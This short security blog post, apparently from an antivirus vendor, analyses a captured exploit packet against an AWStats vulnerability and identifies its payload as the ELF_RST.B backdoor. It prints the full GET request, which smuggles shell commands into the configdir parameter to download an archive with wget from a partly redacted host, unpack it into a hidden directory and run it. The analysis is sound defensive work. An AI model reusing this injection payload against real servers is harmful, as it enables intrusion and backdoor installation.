Tweet

We have received a packet which contains an exploit for theawstat vulnerability.

The exploit is pretty straight forward.

GET /awstats/awstats.pl?configdir=|echo%{blocked};cd%20/tmp;wget%{blocked}ice;
tar%20zxvf%20ice;rm%20-rf%20ice;cd%20.x;./httpd;a;echo%20;echo| HTTP/1.1

As highlighted above, it is pretty clear that the vulnerability in the packet was meant to download a file named ice using wget.

The file ice is actually a gzipped file. This is just another compression tool like winzip and winrar. Gzipped files are more popular on unix users.

Upon downloading, the contents of the file “ice”, is extracted using “tar”(a command in linux to decompress gzipped files) to a “.x” directory, in linux a directory with “.” is a hidden directory.

Among the files that are extracted are httpd(executed upon extraction) and pico. Both files are already detected as ELF_RST.B since january 2002. ELF_RST.B is a backdoor virus, you can read more about it in its malware report.

Note: The filename pico is also the name of a very basic text editor in Linux.